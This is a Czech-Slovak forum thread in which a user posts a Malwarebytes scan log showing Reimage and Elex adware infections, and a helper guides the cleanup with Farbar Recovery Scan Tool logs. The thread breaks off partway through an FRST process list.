na zaciatok:
Velikost slozky "C:\Users\VojtŘch\Desktop" je 7788 MB.
uprac, aby nepresahovala 1GB
+
vycisti PC s MBAM

[Erža]

Sníženo na 700 MB.
Mohu se zeptat, proč to bylo nutné? Urychlení skenu? A má to vliv na výkon PC, i když na ploše mám málo ikon s složek, ale ty složky mají hodně GB?

Při skenu mi to vyhodilo jednu chybovou hlášku:


Log zde (celkem psycho,čekal jsem, že to bude kratší):

Malwarebytes
www.malwarebytes.com

-Podrobnosti logovacího souboru-
Datum skenování: 02.06.17
Čas skenování: 13:38
Logovací soubor: log mab.txt
Správce: Ano

-Informace o softwaru-
Verze: 3.1.2.1733
Verze komponentů: 1.0.139
Aktualizovat verzi balíku komponent: 1.0.2071
Licence: Zkušební

-Systémová informace-
OS: Windows 8.1
CPU: x64
Systém souborů: NTFS
Uživatel: ERZA-NTB\Vojt\u00c4\u009bch

-Shrnutí skenování-
Typ skenování: Vlastní skenování
Výsledek: Dokončeno
Skenované objekty: 408933
Zjištěné hrozby: 150
Hrozby umístěné do karantény: 0
(Nebyly zjištěny žádné škodlivé položky)
Uplynulý čas: 3 hod, 54 min, 25 sek

-Možnosti skenování-
Paměť: Povoleno
Start: Povoleno
Systém souborů: Povoleno
Archivy: Povoleno
Rootkity: Povoleno
Heuristika: Povoleno
Potenciálně nežádoucí program: Povoleno
Potenciálně nežádoucí modifikace: Povoleno

-Podrobnosti skenování-
Proces: 2
PUP.Optional.Reimage, C:\PROGRAM FILES\REIMAGE\REIMAGE PROTECTOR\REISYSTEM.EXE, Žádná uživatelská akce, [1055], [327181],1.0.2071
PUP.Optional.Reimage, C:\PROGRAM FILES\REIMAGE\REIMAGE PROTECTOR\REIGUARD.EXE, Žádná uživatelská akce, [1055], [327181],1.0.2071

Modul: 2
PUP.Optional.Reimage, C:\PROGRAM FILES\REIMAGE\REIMAGE PROTECTOR\REISYSTEM.EXE, Žádná uživatelská akce, [1055], [327181],1.0.2071
PUP.Optional.Reimage, C:\PROGRAM FILES\REIMAGE\REIMAGE PROTECTOR\REIGUARD.EXE, Žádná uživatelská akce, [1055], [327181],1.0.2071

Klíč registru: 42
PUP.Optional.Reimage, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\ReimageRealTimeProtector, Žádná uživatelská akce, [1055], [327181],1.0.2071
PUP.Optional.Reimage, HKLM\SOFTWARE\CLASSES\CLSID\{10ECCE17-29B5-4880-A8F5-EAD298611484}, Žádná uživatelská akce, [1055], [327205],1.0.2071
PUP.Optional.Reimage, HKLM\SOFTWARE\CLASSES\CLSID\{10ECCE17-29B5-4880-A8F5-EAD298611484}\InprocServer32, Žádná uživatelská akce, [1055], [327205],1.0.2071
PUP.Optional.Reimage, HKLM\SOFTWARE\CLASSES\REI_AxControl.ReiEngine, Žádná uživatelská akce, [1055], [327205],1.0.2071
PUP.Optional.Reimage, HKLM\SOFTWARE\CLASSES\REI_AxControl.ReiEngine.1, Žádná uživatelská akce, [1055], [327205],1.0.2071
PUP.Optional.Reimage, HKLM\SOFTWARE\CLASSES\TYPELIB\{FA6468D2-FAA4-4951-A53B-2A5CF9CC0A36}, Žádná uživatelská akce, [1055], [327205],1.0.2071
PUP.Optional.Reimage, HKLM\SOFTWARE\CLASSES\INTERFACE\{9BB31AD8-5DB2-459E-A901-DEA536F23BA4}, Žádná uživatelská akce, [1055], [327205],1.0.2071
PUP.Optional.Reimage, HKLM\SOFTWARE\CLASSES\INTERFACE\{BD51A48E-EB5F-4454-8774-EF962DF64546}, Žádná uživatelská akce, [1055], [327205],1.0.2071
PUP.Optional.Reimage, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{9BB31AD8-5DB2-459E-A901-DEA536F23BA4}, Žádná uživatelská akce, [1055], [327205],1.0.2071
PUP.Optional.Reimage, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{BD51A48E-EB5F-4454-8774-EF962DF64546}, Žádná uživatelská akce, [1055], [327205],1.0.2071
PUP.Optional.Reimage, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{9BB31AD8-5DB2-459E-A901-DEA536F23BA4}, Žádná uživatelská akce, [1055], [327205],1.0.2071
PUP.Optional.Reimage, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{BD51A48E-EB5F-4454-8774-EF962DF64546}, Žádná uživatelská akce, [1055], [327205],1.0.2071
PUP.Optional.Reimage, HKLM\SOFTWARE\WOW6432NODE\CLASSES\TYPELIB\{FA6468D2-FAA4-4951-A53B-2A5CF9CC0A36}, Žádná uživatelská akce, [1055], [327205],1.0.2071
PUP.Optional.Reimage, HKLM\SOFTWARE\CLASSES\WOW6432NODE\TYPELIB\{FA6468D2-FAA4-4951-A53B-2A5CF9CC0A36}, Žádná uživatelská akce, [1055], [327205],1.0.2071
PUP.Optional.Reimage, HKLM\SOFTWARE\CLASSES\CLSID\{801B440B-1EE3-49B0-B05D-2AB076D4E8CB}, Žádná uživatelská akce, [1055], [327205],1.0.2071
PUP.Optional.Reimage, HKLM\SOFTWARE\CLASSES\CLSID\{801B440B-1EE3-49B0-B05D-2AB076D4E8CB}\InprocServer32, Žádná uživatelská akce, [1055], [327205],1.0.2071
PUP.Optional.Reimage, HKU\S-1-5-21-3751293310-3690691840-2036008392-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{10ECCE17-29B5-4880-A8F5-EAD298611484}, Žádná uživatelská akce, [1055], [327205],1.0.2071
PUP.Optional.Reimage, HKLM\SOFTWARE\WOW6432NODE\CLASSES\APPID\{28FF42B8-A0DA-4BE5-9B81-E26DD59B350A}, Žádná uživatelská akce, [1055], [332494],1.0.2071
PUP.Optional.Reimage, HKLM\SOFTWARE\CLASSES\WOW6432NODE\APPID\{28FF42B8-A0DA-4BE5-9B81-E26DD59B350A}, Žádná uživatelská akce, [1055], [332494],1.0.2071
PUP.Optional.Reimage, HKLM\SOFTWARE\CLASSES\APPID\{28FF42B8-A0DA-4BE5-9B81-E26DD59B350A}, Žádná uživatelská akce, [1055], [332494],1.0.2071
PUP.Optional.Reimage, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Reimage Repair, Žádná uživatelská akce, [1055], [327184],1.0.2071
PUP.Optional.Reimage, HKLM\SOFTWARE\CLASSES\WOW6432NODE\APPID\REI_AxControl.DLL, Žádná uživatelská akce, [1055], [327193],1.0.2071
PUP.Optional.Reimage, HKLM\SOFTWARE\WOW6432NODE\CLASSES\APPID\REI_AxControl.DLL, Žádná uživatelská akce, [1055], [327193],1.0.2071
PUP.Optional.Reimage, HKCR\\REI_AxControl.ReiEngine, Žádná uživatelská akce, [1055], [327197],1.0.2071
PUP.Optional.Reimage, HKCR\\REI_AxControl.ReiEngine.1, Žádná uživatelská akce, [1055], [327197],1.0.2071
PUP.Optional.Reimage, HKLM\SOFTWARE\CLASSES\APPID\REI_AxControl.DLL, Žádná uživatelská akce, [1055], [327193],1.0.2071
PUP.Optional.Reimage, HKU\S-1-5-21-3751293310-3690691840-2036008392-1001\SOFTWARE\Reimage, Žádná uživatelská akce, [1055], [357494],1.0.2071
PUP.Optional.Reimage, HKU\S-1-5-21-3751293310-3690691840-2036008392-1001\SOFTWARE\LOCAL APPWIZARD-GENERATED APPLICATIONS\Reimage - Windows Problem Relief., Žádná uživatelská akce, [1055], [327203],1.0.2071
RiskWare.IFEOHijack, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\GOOGLEUPDATE.EXE, Žádná uživatelská akce, [691], [401845],1.0.2071
RiskWare.IFEOHijack, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\GOOGLEUPDATERSERVICE.EXE, Žádná uživatelská akce, [691], [401846],1.0.2071
RiskWare.IFEOHijack, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\GOOGLEUPDATE.EXE, Žádná uživatelská akce, [691], [401845],1.0.2071
Adware.Elex, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Milimili, Žádná uživatelská akce, [2], [364096],1.0.2071
PUP.Optional.Reimage, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\ReimageUpdater, Žádná uživatelská akce, [1055], [332364],1.0.2071
PUP.Optional.Reimage, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\REIMAGE.EXE, Žádná uživatelská akce, [1055], [327200],1.0.2071
PUP.Optional.Reimage, HKLM\SOFTWARE\REIMAGE\Reimage Repair, Žádná uživatelská akce, [1055], [336077],1.0.2071
PUP.Optional.Elex, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\WinSAPSvc, Žádná uživatelská akce, [8], [339887],1.0.2071
PUP.Optional.Reimage, HKU\S-1-5-21-3751293310-3690691840-2036008392-1001\SOFTWARE\REIMAGE\PC REPAIR, Žádná uživatelská akce, [1055], [327204],1.0.2071
RiskWare.IFEOHijack, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\GOOGLEUPDATERSERVICE.EXE, Žádná uživatelská akce, [691], [401846],1.0.2071
Adware.Elex, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{7B251AA4-58E4-4D7F-9B64-F51E457AC541}, Žádná uživatelská akce, [2], [364093],1.0.2071
PUP.Optional.Reimage, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{DEE8C723-F618-4DA3-9705-799F2DCA3BBA}, Žádná uživatelská akce, [1055], [332365],1.0.2071
PUP.Optional.Reimage, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\REIMAGE.EXE, Žádná uživatelská akce, [1055], [327200],1.0.2071
PUP.Optional.Reimage, HKLM\SOFTWARE\REIMAGE\REIMAGE PROTECTOR, Žádná uživatelská akce, [1055], [332504],1.0.2071

Hodnota v registru: 10
RiskWare.IFEOHijack, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\GOOGLEUPDATE.EXE|DEBUGGER, Žádná uživatelská akce, [691], [401845],1.0.2071
RiskWare.IFEOHijack, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\GOOGLEUPDATERSERVICE.EXE|DEBUGGER, Žádná uživatelská akce, [691], [401846],1.0.2071
RiskWare.IFEOHijack, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\GOOGLEUPDATE.EXE|DEBUGGER, Žádná uživatelská akce, [691], [401845],1.0.2071
PUP.Optional.Reimage, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\REIMAGE.EXE|, Žádná uživatelská akce, [1055], [327200],1.0.2071
PUP.Optional.Reimage, HKU\S-1-5-21-3751293310-3690691840-2036008392-1001\SOFTWARE\REIMAGE\PC REPAIR|QUITMESSAGE, Žádná uživatelská akce, [1055], [327204],1.0.2071
RiskWare.IFEOHijack, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\GOOGLEUPDATERSERVICE.EXE|DEBUGGER, Žádná uživatelská akce, [691], [401846],1.0.2071
Adware.Elex, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{7B251AA4-58E4-4D7F-9B64-F51E457AC541}|PATH, Žádná uživatelská akce, [2], [364093],1.0.2071
PUP.Optional.Reimage, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{DEE8C723-F618-4DA3-9705-799F2DCA3BBA}|PATH, Žádná uživatelská akce, [1055], [332365],1.0.2071
PUP.Optional.Reimage, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\REIMAGE.EXE|, Žádná uživatelská akce, [1055], [327200],1.0.2071
PUP.Optional.Reimage, HKLM\SOFTWARE\REIMAGE\REIMAGE PROTECTOR|CFLPATH, Žádná uživatelská akce, [1055], [332504],1.0.2071

Data registrů: 0
(Nebyly zjištěny žádné škodlivé položky)

Datové proudy: 0
(Nebyly zjištěny žádné škodlivé položky)

Adresář: 20
PUP.Optional.Reimage, C:\Program Files\Reimage\Reimage Repair\Microsoft.VC90.CRT, Žádná uživatelská akce, [1055], [327184],1.0.2071
PUP.Optional.Reimage, C:\Program Files\Reimage\Reimage Protector, Žádná uživatelská akce, [1055], [327184],1.0.2071
PUP.Optional.Reimage, C:\Program Files\Reimage\Reimage Repair, Žádná uživatelská akce, [1055], [327184],1.0.2071
PUP.Optional.Reimage, C:\PROGRAM FILES\REIMAGE, Žádná uživatelská akce, [1055], [327184],1.0.2071
Adware.Elex, C:\Program Files (x86)\Gretiryanuhusp\_ALLOWDEL_49a029e, Žádná uživatelská akce, [2], [403883],1.0.2071
Adware.Elex, C:\Program Files (x86)\Gretiryanuhusp, Žádná uživatelská akce, [2], [403883],1.0.2071
PUP.Optional.Reimage, C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\REIMAGE REPAIR, Žádná uživatelská akce, [1055], [327185],1.0.2071
PUP.Optional.Reimage, C:\ProgramData\Reimage Protector\Results, Žádná uživatelská akce, [1055], [332488],1.0.2071
PUP.Optional.Reimage, C:\PROGRAMDATA\REIMAGE PROTECTOR, Žádná uživatelská akce, [1055], [332488],1.0.2071
PUP.Optional.Reimage, C:\rei\Results\EXE1.8.5.8\RUN20170602_0856, Žádná uživatelská akce, [1055], [327187],1.0.2071
PUP.Optional.Reimage, C:\rei\Temp\20170602_0856\DownloaderTemp, Žádná uživatelská akce, [1055], [327187],1.0.2071
PUP.Optional.Reimage, C:\rei\AV\Microsoft.VC90.CRT, Žádná uživatelská akce, [1055], [327187],1.0.2071
PUP.Optional.Reimage, C:\rei\Results\EXE1.8.5.8, Žádná uživatelská akce, [1055], [327187],1.0.2071
PUP.Optional.Reimage, C:\rei\Temp\20170602_0856, Žádná uživatelská akce, [1055], [327187],1.0.2071
PUP.Optional.Reimage, C:\rei\Results, Žádná uživatelská akce, [1055], [327187],1.0.2071
PUP.Optional.Reimage, C:\rei\Temp, Žádná uživatelská akce, [1055], [327187],1.0.2071
PUP.Optional.Reimage, C:\rei\AV, Žádná uživatelská akce, [1055], [327187],1.0.2071
PUP.Optional.Reimage, C:\REI, Žádná uživatelská akce, [1055], [327187],1.0.2071
Adware.Elex, C:\Stuvatybugtain, Žádná uživatelská akce, [2], [403922],1.0.2071
Adware.Elex, C:\Users\Vojtěch\AppData\Local\Stubertain, Žádná uživatelská akce, [2], [403887],1.0.2071

Soubor: 74
PUP.Optional.Reimage, C:\PROGRAM FILES\REIMAGE\REIMAGE PROTECTOR\REISYSTEM.EXE, Žádná uživatelská akce, [1055], [327181],1.0.2071
PUP.Optional.Reimage, C:\PROGRAM FILES\REIMAGE\REIMAGE PROTECTOR\REIGUARD.EXE, Žádná uživatelská akce, [1055], [327181],1.0.2071
PUP.Optional.Reimage, C:\PROGRAM FILES\REIMAGE\REIMAGE REPAIR\REI_AXCONTROL.DLL, Žádná uživatelská akce, [1055], [327205],1.0.2071
PUP.Optional.Reimage, C:\PROGRAM FILES\REIMAGE\REIMAGE PROTECTOR\REISCANNER.EXE, Žádná uživatelská akce, [1055], [327181],1.0.2071
PUP.Optional.Reimage, C:\PROGRAM FILES\REIMAGE\REIMAGE REPAIR\REIMAGEREPAIR.EXE, Žádná uživatelská akce, [1055], [331559],1.0.2071
PUP.Optional.Reimage, C:\PROGRAM FILES\REIMAGE\REIMAGE REPAIR\SAVAPI3.DLL, Žádná uživatelská akce, [1055], [327181],1.0.2071
PUP.Optional.Reimage, C:\PROGRAM FILES\REIMAGE\REIMAGE PROTECTOR\PROTECTORUPDATER.EXE, Žádná uživatelská akce, [1055], [388085],1.0.2071
PUP.Optional.Reimage, C:\PROGRAM FILES\REIMAGE\REIMAGE REPAIR\REIMAGEICON.ICO, Žádná uživatelská akce, [1055], [327184],1.0.2071
PUP.Optional.Reimage, C:\Program Files\Reimage\Reimage Protector\ReiProtectorM.exe, Žádná uživatelská akce, [1055], [327184],1.0.2071
PUP.Optional.Reimage, C:\Program Files\Reimage\Reimage Repair\Microsoft.VC90.CRT\Microsoft.VC90.CRT.manifest, Žádná uživatelská akce, [1055], [327184],1.0.2071
PUP.Optional.Reimage, C:\Program Files\Reimage\Reimage Repair\Microsoft.VC90.CRT\msvcr90.dll, Žádná uživatelská akce, [1055], [327184],1.0.2071
PUP.Optional.Reimage, C:\Program Files\Reimage\Reimage Repair\LZMA.EXE, Žádná uživatelská akce, [1055], [327184],1.0.2071
PUP.Optional.Reimage, C:\Program Files\Reimage\Reimage Repair\Reimage Repair.url, Žádná uživatelská akce, [1055], [327184],1.0.2071
PUP.Optional.Reimage, C:\Program Files\Reimage\Reimage Repair\Reimage.exe, Žádná uživatelská akce, [1055], [327184],1.0.2071
PUP.Optional.Reimage, C:\Program Files\Reimage\Reimage Repair\ReimageReminder.exe, Žádná uživatelská akce, [1055], [327184],1.0.2071
PUP.Optional.Reimage, C:\Program Files\Reimage\Reimage Repair\ReimageSafeMode.exe, Žádná uživatelská akce, [1055], [327184],1.0.2071
PUP.Optional.Reimage, C:\Program Files\Reimage\Reimage Repair\Reimage_SafeMode.ico, Žádná uživatelská akce, [1055], [327184],1.0.2071
PUP.Optional.Reimage, C:\Program Files\Reimage\Reimage Repair\Reimage_uninstall.ico, Žádná uživatelská akce, [1055], [327184],1.0.2071
PUP.Optional.Reimage, C:\Program Files\Reimage\Reimage Repair\Reimage_website.ico, Žádná uživatelská akce, [1055], [327184],1.0.2071
PUP.Optional.Reimage, C:\Program Files\Reimage\Reimage Repair\REI_AVIRA.exe, Žádná uživatelská akce, [1055], [327184],1.0.2071
PUP.Optional.Reimage, C:\Program Files\Reimage\Reimage Repair\REI_AxControl.inf, Žádná uživatelská akce, [1055], [327184],1.0.2071
PUP.Optional.Reimage, C:\Program Files\Reimage\Reimage Repair\REI_Axcontrol.lza, Žádná uživatelská akce, [1055], [327184],1.0.2071
PUP.Optional.Reimage, C:\Program Files\Reimage\Reimage Repair\REI_Engine.dll, Žádná uživatelská akce, [1055], [327184],1.0.2071
PUP.Optional.Reimage, C:\Program Files\Reimage\Reimage Repair\REI_Engine.lza, Žádná uživatelská akce, [1055], [327184],1.0.2071
PUP.Optional.Reimage, C:\Program Files\Reimage\Reimage Repair\REI_SupportInfoTool.exe, Žádná uživatelská akce, [1055], [327184],1.0.2071
PUP.Optional.Reimage, C:\Program Files\Reimage\Reimage Repair\uninst.exe, Žádná uživatelská akce, [1055], [327184],1.0.2071
PUP.Optional.Reimage, C:\Program Files\Reimage\Reimage Repair\version.rei, Žádná uživatelská akce, [1055], [327184],1.0.2071
Adware.Elex, C:\Program Files (x86)\Gretiryanuhusp\_ALLOWDEL_49a029e\1111111, Žádná uživatelská akce, [2], [403883],1.0.2071
Adware.Elex, C:\Program Files (x86)\Gretiryanuhusp\_ALLOWDEL_49a029e\33, Žádná uživatelská akce, [2], [403883],1.0.2071
Adware.Elex, C:\Program Files (x86)\Gretiryanuhusp\_ALLOWDEL_49a029e\3333333, Žádná uživatelská akce, [2], [403883],1.0.2071
Adware.Elex, C:\Program Files (x86)\Gretiryanuhusp\dereph.exe, Žádná uživatelská akce, [2], [403883],1.0.2071
Adware.Elex, C:\Program Files (x86)\Gretiryanuhusp\Thuvale.dll, Žádná uživatelská akce, [2], [403883],1.0.2071
Adware.Elex, C:\Program Files (x86)\Gretiryanuhusp\yaupdcache.exe, Žádná uživatelská akce, [2], [403883],1.0.2071
PUP.Optional.Reimage, C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\REIMAGE REPAIR\REIMAGE REPAIR.LNK, Žádná uživatelská akce, [1055], [327185],1.0.2071
PUP.Optional.Reimage, C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Reimage Repair\Help & Support.lnk, Žádná uživatelská akce, [1055], [327185],1.0.2071
PUP.Optional.Reimage, C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Reimage Repair\Run in safe mode.lnk, Žádná uživatelská akce, [1055], [327185],1.0.2071
PUP.Optional.Reimage, C:\PROGRAMDATA\REIMAGE PROTECTOR\RESULTS\PROTECTORUPDATER.LOG, Žádná uživatelská akce, [1055], [332488],1.0.2071
PUP.Optional.Reimage, C:\ProgramData\Reimage Protector\Results\active_protection.txt, Žádná uživatelská akce, [1055], [332488],1.0.2071
PUP.Optional.Reimage, C:\ProgramData\Reimage Protector\Results\ProtectorPackage.log, Žádná uživatelská akce, [1055], [332488],1.0.2071
PUP.Optional.Reimage, C:\ProgramData\Reimage Protector\Results\scan_agent_result_log.txt, Žádná uživatelská akce, [1055], [332488],1.0.2071
PUP.Optional.Reimage, C:\ProgramData\Reimage Protector\Results\url_setting_definitions.txt, Žádná uživatelská akce, [1055], [332488],1.0.2071
PUP.Optional.Reimage, C:\ProgramData\Reimage Protector\cfl.rei, Žádná uživatelská akce, [1055], [332488],1.0.2071
PUP.Optional.Reimage, C:\REI\AV\HBEDV.KEY, Žádná uživatelská akce, [1055], [327187],1.0.2071
PUP.Optional.Reimage, C:\rei\AV\Microsoft.VC90.CRT\Microsoft.VC90.CRT.manifest, Žádná uživatelská akce, [1055], [327187],1.0.2071
PUP.Optional.Reimage, C:\rei\AV\Microsoft.VC90.CRT\msvcr90.dll, Žádná uživatelská akce, [1055], [327187],1.0.2071
PUP.Optional.Reimage, C:\rei\AV\avupdate.conf, Žádná uživatelská akce, [1055], [327187],1.0.2071
PUP.Optional.Reimage, C:\rei\AV\avupdate.exe, Žádná uživatelská akce, [1055], [327187],1.0.2071
PUP.Optional.Reimage, C:\rei\AV\avupdate_msg.avr, Žádná uživatelská akce, [1055], [327187],1.0.2071
PUP.Optional.Reimage, C:\rei\AV\savapi3_restart.exe, Žádná uživatelská akce, [1055], [327187],1.0.2071
PUP.Optional.Reimage, C:\rei\AV\savapi3_start.exe, Žádná uživatelská akce, [1055], [327187],1.0.2071
PUP.Optional.Reimage, C:\rei\AV\savapi3_stop.exe, Žádná uživatelská akce, [1055], [327187],1.0.2071
PUP.Optional.Reimage, C:\rei\Results\EXE1.8.5.8\RUN20170602_0856\debug-repair-2.log, Žádná uživatelská akce, [1055], [327187],1.0.2071
PUP.Optional.Reimage, C:\rei\Results\EXE1.8.5.8\RUN20170602_0856\debug-repair.log, Žádná uživatelská akce, [1055], [327187],1.0.2071
PUP.Optional.Reimage, C:\rei\Results\EXE1.8.5.8\RUN20170602_0856\Info_EnvironmentVars.res, Žádná uživatelská akce, [1055], [327187],1.0.2071
PUP.Optional.Reimage, C:\rei\Results\EXE1.8.5.8\RUN20170602_0856\Info_Installed.rec, Žádná uživatelská akce, [1055], [327187],1.0.2071
PUP.Optional.Reimage, C:\rei\Results\EXE1.8.5.8\RUN20170602_0856\JunkScanRes.xml, Žádná uživatelská akce, [1055], [327187],1.0.2071
PUP.Optional.Reimage, C:\rei\Results\EXE1.8.5.8\RUN20170602_0856\out.log, Žádná uživatelská akce, [1055], [327187],1.0.2071
PUP.Optional.Reimage, C:\rei\Results\EXE1.8.5.8\RUN20170602_0856\RegistryScanRes.xml, Žádná uživatelská akce, [1055], [327187],1.0.2071
PUP.Optional.Reimage, C:\rei\Results\EXE1.8.5.8\RUN20170602_0856\StabilityScanRes.xml, Žádná uživatelská akce, [1055], [327187],1.0.2071
PUP.Optional.Reimage, C:\rei\Temp\20170602_0856\ApplicationList.ini, Žádná uživatelská akce, [1055], [327187],1.0.2071
PUP.Optional.Reimage, C:\rei\About.txt, Žádná uživatelská akce, [1055], [327187],1.0.2071
PUP.Optional.Reimage, C:\rei\cfl.rei, Žádná uživatelská akce, [1055], [327187],1.0.2071
PUP.Optional.Reimage, C:\rei\rei1858nvt.ini, Žádná uživatelská akce, [1055], [327187],1.0.2071
PUP.Optional.Reimage, C:\rei\reimage.qsr, Žádná uživatelská akce, [1055], [327187],1.0.2071
PUP.Optional.Reimage, C:\rei\SupportInfoTool.ini, Žádná uživatelská akce, [1055], [327187],1.0.2071
Adware.Elex, C:\Stuvatybugtain\Aramory.lqe, Žádná uživatelská akce, [2], [403922],1.0.2071
PUP.Optional.Reimage, C:\USERS\VOJTěCH\APPDATA\LOCAL\MICROSOFT\WINDOWS\INETCACHE\IE\GIBXX9VU\REIMAGEPACKAGE1858X64[1].EXE, Žádná uživatelská akce, [1055], [331559],1.0.2071
PUP.Optional.Reimage, C:\USERS\VOJTěCH\APPDATA\LOCAL\MICROSOFT\WINDOWS\INETCACHE\IE\J5NBPV1I\PROTECTORPACKAGERR2020X64[1].EXE, Žádná uživatelská akce, [1055], [388085],1.0.2071
PUP.Optional.Reimage, C:\USERS\VOJTěCH\APPDATA\LOCAL\TEMP\REIMAGEPACKAGE.EXE, Žádná uživatelská akce, [1055], [331559],1.0.2071
PUP.Optional.Reimage, C:\USERS\VOJTěCH\DOWNLOADS\REIMAGEREPAIR.EXE, Žádná uživatelská akce, [1055], [331559],1.0.2071
PUP.Optional.SpeedItUp, C:\WINDOWS\REIMAGE.INI, Žádná uživatelská akce, [1152], [329423],1.0.2071
PUP.Optional.Reimage, C:\WINDOWS\SYSTEM32\TASKS\REIMAGEUPDATER, Žádná uživatelská akce, [1055], [327190],1.0.2071
Adware.Elex.Generic, C:\WINDOWS\SYSTEM32\TASKS\MICROSOFT\WINDOWS\DEVICESETTINGS\VVERGE, Žádná uživatelská akce, [1107], [402798],1.0.2071
PUP.Optional.Reimage, C:\WINDOWS\TEMP\REIMAGE.LOG, Žádná uživatelská akce, [1055], [334717],1.0.2071

Fyzický sektor: 0
(Nebyly zjištěny žádné škodlivé položky)


(end)

[Erža]

Ad k předchozímu příspěvku:
Nic jsem zatím radši neodstraňoval, čekám na další instrukce

[JaRon]

Vsetko najdene nechaj odstranit
Restart a naois, ci su nejake problemy?

[Erža]

Žádná změna.


Je to děs...jakoby si mě dělali prdel...furt mi vyskakujou hlášky z Malwarebytes a sem tam i z Avastu.

[Erža]

Fuj, ten obrázek je děs....jestli máte nějaký vhodnější img upload, rád si nechám poradit.
Problémy přetrvávají, je to děs. Zažil jsem různé "útoky" nebo "viry", ale tohle je zatím top!
Pokud do vyhledávače konkrétně nenapíši adresu http://www.něconěco .... tak jedu na mystart.
Humus. Je to vůbec legální ?

Edit: Samozřejmě, v rámci nastavení v kolonce "Vyhledávaní" prohlížeče není možnost kliknout na "křížek" a odstranit to.
Edit2: Mám zde určitá soukromá pracovní data. Samo sebou, že jsem je nejdřív zálohoval. Mám však jisté obavy, ohledně používání prohlížeče - mám se vyvarovat nějakých akcí ?
Edit3: Čistě akademicky - co to sakra je? Jestli je to legální, proč je to takový problém odstranit? Jak se to u mě vlastně vyskytlo? Nejsem si vědom, že bych si to nainstaloval vedomně.

[JaRon]

Vycisti PC https://forum.viry.cz/viewtopic.php?f=1 ... e#p1483696
oba kroky
Nakaza bola pravdepodobne pribalene ako darcek k nejakemu SW

[Erža]

Problém přetrvává. Logy v příloze.

[JaRon]

Nuz urazili sme slusnu cestu, velka cast zavirencov je odstranena
Vloz oba logy FRST, ako na zaciatku - pozriem aktualny stav
Vacsinu smejdov si si natahal pokutnymi programami ku PDF

[Erža]

To rád slyším
Jak přesně to funguje? Rád bych se tomu příště vyvaroval.

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 02-06-2017
Ran by Vojtěch (administrator) on ERZA-NTB (03-06-2017 14:08:49)
Running from C:\Users\Vojtěch\Desktop
Loaded Profiles: Vojtěch (Available Profiles: Vojtěch & Administrator)
Platform: Windows 8.1 (Update) (X64) Language: Čeština (Česká republika)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Autodesk Inc.) C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgrSvc.exe
(Autodesk, Inc.) C:\Program Files (x86)\Autodesk\Content Service\Connect.Service.ContentService.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Acer Incorporate) C:\Program Files\Acer\Acer Launch Manager\LMSvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(pdfforge GmbH) C:\Program Files\PDF Architect 5\creator-ws.exe
